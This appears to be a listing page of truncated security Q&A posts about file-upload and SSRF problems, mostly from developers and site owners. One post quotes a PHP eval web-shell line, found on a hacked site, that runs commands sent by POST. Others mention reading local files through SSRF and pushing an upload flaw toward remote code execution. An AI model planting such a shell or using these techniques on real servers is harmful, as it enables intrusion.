Collaborate Disseminate
Say I’ve found a perfect SSRF vulnerability in a web application that lets me send web requests to any URL, any host, any port, any scheme. I can use the file:// scheme to get the contents of local files, such as file:///C:/Windows/win.ini… Continue reading Uploading/writing server files via SSRF?
On my website I found a file containing this code
<?php if(isset($_POST[z]))eval($_POST[z]);?>
It’s my understanding that the hacker is using this to execute any PHP command send via a POST request.
I’m trying to see how this file g… Continue reading Need guidance on detecting how a hacked file got upload on my website [duplicate]
The web-application I’m working on will allow users to upload files (Word / PDF etc.). I intend to run a clamav scan on the files after upload before anything further is done with them.
From a security perspective is there any diference o… Continue reading File Upload – scan in-memory or after saving
I’ m building a REST API with Django and Django Rest Framework. I allow users to upload images and videos using different subclasses of ModelSerializer. When a file is received, the server saves it to a temporary file on the disk (with Dja… Continue reading Django File Validation
We have a web server with an application – there is a large data array attached to the application via a mount point. We have to fulfill the requirement of securing in-transit data and at-rest data. This application is designed to host a r… Continue reading Is there an encryption mechanism for binary data with expiration for rotating keys?
While I was pentesting a web application, I found out that files that are uploaded to the web application are stored in an AWS S3 instance. Based on my experience, when a web application needs to store all types of files, including files w… Continue reading Amazon AWS S3 Unrestricted File Upload
I would like to allow users of my app to upload images in different formats that other users can view (including webm videos).
But I would also like to make sure that the images are actual images and not harmful to display.
So heres my 3 c… Continue reading How can I make sure an image uploaded to my server is not harmful?
I’m testing on application which runs on NodeJS, and discovered unrestriced file upload vulnerability, path traversal is not possible.
Uploaded file is visitable, I can upload .html to perform XSS attack, however I want something more. I’m… Continue reading NodeJS, unrestricted file upload, RCE [closed]
Would it be possible to write a file to a directory outside of the uploads folder if the $ext variable is used controlled and unrestricted? The uploads directory is empty except for the freshly created file.
val file = new File("uploa… Continue reading Unrestricted file write in Java
How much video uploading could be trackable for some person who uses the Tor Browser for uploading video on YouTube or other video hosting services with low authorization and sign-up processing, like Vimeo?
And which group (hackers or …) h… Continue reading Anonymous video uploading on an internet host